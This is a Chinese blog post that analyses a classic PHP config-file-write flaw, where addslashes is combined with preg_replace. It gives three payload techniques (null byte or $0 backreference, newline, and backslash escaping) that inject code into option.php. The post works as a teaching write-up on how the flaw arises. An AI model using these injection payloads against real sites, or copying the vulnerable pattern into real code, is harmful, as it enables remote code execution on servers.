@author: Dlive

P牛在小密圈中发的一个有关使用PHP正则配合写配置文件导致Getshell的经典漏洞

漏洞代码是这样的:

<?php

//ph.php

$str = addslashes($_GET['option']);

$file = file_get_contents('option.php');

$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);

var_dump($file);

file_put_contents('option.php', $file);


<?php

//option.php

$option='123';

0x01 利用%00$0

这是我当时利用的一个方法(感觉我这个方法绕了好大一个弯儿QAQ)

payload:

http://192.168.204.238/test/ph.php?option=;phpinfo();

http://192.168.204.238/test/ph.php?option=%00

第二次传入的%00换为$0可达到相同效果

参考php手册对\0$0的描述:

http://php.net/manual/zh/function.preg-replace.php

\\0和$0代表完整的模式匹配文本

%00addslashes()转为\0,而\0preg_replace函数的第二个参数中代表“匹配到的全部内容”($0同理)

此时preg_replace要执行的代码如下

preg_replace('|\$option=\'.*\';|',"\$option='\\0';",$file);



preg_replace('|\$option=\'.*\';|',"\$option='$0';",$file);

即执行

preg_replace('|\$option=\'.*\';|',"\$option='$option=';phpinfo();';';",$file);

成功闭合单引号写入如下shell

<?php

$option='$option=';phpinfo();';';

0x02 利用换行符%0a和正则匹配缺陷

第一次传入 aaa';phpinfo();%0a//

此时文件内容

$option='aaa\';phpinfo();

//';

第二次传入随意字符串,如bbb, 正则代码.*会将匹配到的aaa\替换为bbb (正则匹配的缺陷)

此时文件内容(成功写入恶意代码)

$option='bbb';phpinfo();

//';

0x03 利用反斜杠转义单引号

payload:

http://192.168.204.238/test/ph.php?option=\';phpinfo();//

虽然addslashes将\转义为\\但是经过preg_replace处理后\\又变为了\

view-source:http://192.168.204.247/test/ph.php?option=\

string(19) "after addslashes:\\"

string(42) "second param of preg_replace:$option='\\';"

string(37) "after preg_replace:<?php

$option='\';"

最后的单引号被反斜杠转义

PHP正则经典漏洞的更多相关文章

  1. PHP配置文件经典漏洞

    phithon师父在小蜜圈里放了一个经典的配置文件写入问题漏洞. <?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET[' ...

  2. 【经典漏洞案例】NSA黑客工具包——Windows 0day验证实验

    还记得今年4月中旬,Shadow Brokers(影子经纪人)黑客组织发布出一份震惊世界的机密文档,其中包含了多个Windows 远程漏洞利用工具,此工具集覆盖大量的Windows服务 器,可以被任何 ...

  3. 经典漏洞-后台备份数据库getshell

    由于接触安全时间不多,一些老的getshell方法不是很清楚.这次碰到了个老站,正好学习了一下. 首先这边是用户名可以猜测出来的,因为输入错误的用户名显示用户名不存在,如果存在的话会显示密码错误. 爆 ...

  4. 小白日记38:kali渗透测试之Web渗透-手动漏洞挖掘(四)-文件上传漏洞

    手动漏洞挖掘 文件上传漏洞[经典漏洞,本身为一个功能,根源:对上传文件的过滤机制不严谨] <?php echo shell_exec($_GET['cmd']);?> 直接上传webshe ...

  5. Java 正则表达式漏洞

    由于工作原因,一直没有时间把在线上遇到的问题总结一下.还好,今天我来了. 废话少说了. 主要说一下“java 正则表达式中的一个漏洞”,详细问题描述 http://bugs.sun.com/bugda ...

  6. 书评第003篇:《0day安全:软件漏洞分析技术(第2版)》

    本书基本信息 丛书名:安全技术大系 作者:王清(主编),张东辉.周浩.王继刚.赵双(编著) 出版社:电子工业出版社 出版时间:2011-6-1 ISBN:9787121133961 版次:1 页数:7 ...

  7. 手工挖掘web常见漏洞时的一些经验总结

    一.前提: 漏洞挖掘原则 所有变量 所有头 cookie中的变量 逐个变量删除 漏洞的本质 数据与指令的混淆 对用户输入信息过滤不严判断失误,误将数据当指令 二.经典漏洞: 1.身份认证 常用弱口令/ ...

  8. SSRF漏洞详解

    0.SSRF简介 SSRF全称为Server-side Request Forgery,即服务端请求伪造攻击,是一种由攻击者构造形成由服务器端发起请求的一个漏洞,一般情况下,SSRF 攻击的目标是从外 ...

  9. google hack使用集锦

    转载:https://blog.csdn.net/weixin_42127015/article/details/84472777 关于google hack的几个基础过滤器使用[请务必谨记,过滤器虽 ...

随机推荐

  1. HDFS伪分布式环境搭建

    (一).HDFS shell操作 以上已经介绍了如何搭建伪分布式的Hadoop,既然环境已经搭建起来了,那要怎么去操作呢?这就是本节将要介绍的内容: HDFS自带有一些shell命令,通过这些命令我们 ...

  2. 十分钟掌握pandas中文版(pandas官方文档翻译)

    转载自 https://blog.csdn.net/jiangjiang_jian/article/details/80022918

  3. 对TDD的实践感悟

    文章:我的TDD实践:可测试性驱动开发(上) 文章表达的思想是,达到一个目的并非只有一种套路,作者用写代码时,时刻考虑代码的可测试性,来推动项目的合理开发.

  4. scrapy学习-爬取天天基金网基金列表

    目录 描述 环境描述 步骤记录 创建scrapy项目 设置在pycharm下运行scrapy项目 分析如何获取数据 编写代码 step 1:设置item step 2:编写spider step 3: ...

  5. ArcGIS Engine开发中利用GP工具时常出现的错误

    在用GP工具的时候常常会碰到这个错误: 调用 GP 对 COM 组件的调用返回了错误 HRESULT E_FAIL 解决方案: 这种情况一般有两种可能. 1.AE程序的license的级别不够. 2. ...

  6. Android中有哪些好的开发框架?

    在安卓开发中,框架的使用必不可少,合理利用一些好的开发框架,往往可以达到事半功倍的效果.本文小编就将和大家分享安卓开发者不得不知的5款框架,一起来看看吧,新技能get走起~~ 1.thinkAndro ...

  7. P1140 相似基因

    题目背景 大家都知道,基因可以看作一个碱基对序列.它包含了4种核苷酸,简记作A,C,G,T.生物学家正致力于寻找人类基因的功能,以利用于诊断疾病和发明药物. 在一个人类基因工作组的任务中,生物学家研究 ...

  8. [洛谷P3803] 【模板】多项式乘法(FFT, NTT)

    题目大意:$FFT$,给你两个多项式,请输出乘起来后的多项式. 题解:$FFT$,由于给的$n$不是很大,也可以用$NTT$做 卡点:无 C++ Code:  FFT: #include <cs ...

  9. [codeforces] 17E Palisection

    原题 题目要求相交的回文串对数,这显然非常难,但是要有一种正难则反的心态,求不出来相交的,求出来不相交的不就好了! 对于每以位置i结尾的字符串,在他后面与他不相交的就是以这个位置为结尾的个数和以这个位 ...

  10. 【BZOJ4325】NOIP2015 斗地主 搜索+贪心

    这个东西考试的时候一眼以为状压就压炸了考试又了一下午.....最后我打出来发现后几个点10min都过不去,我大概算了一下,可能是吧.......最后一脸懵逼的我去怂了正解,我们发现只要确定了顺子就可以 ...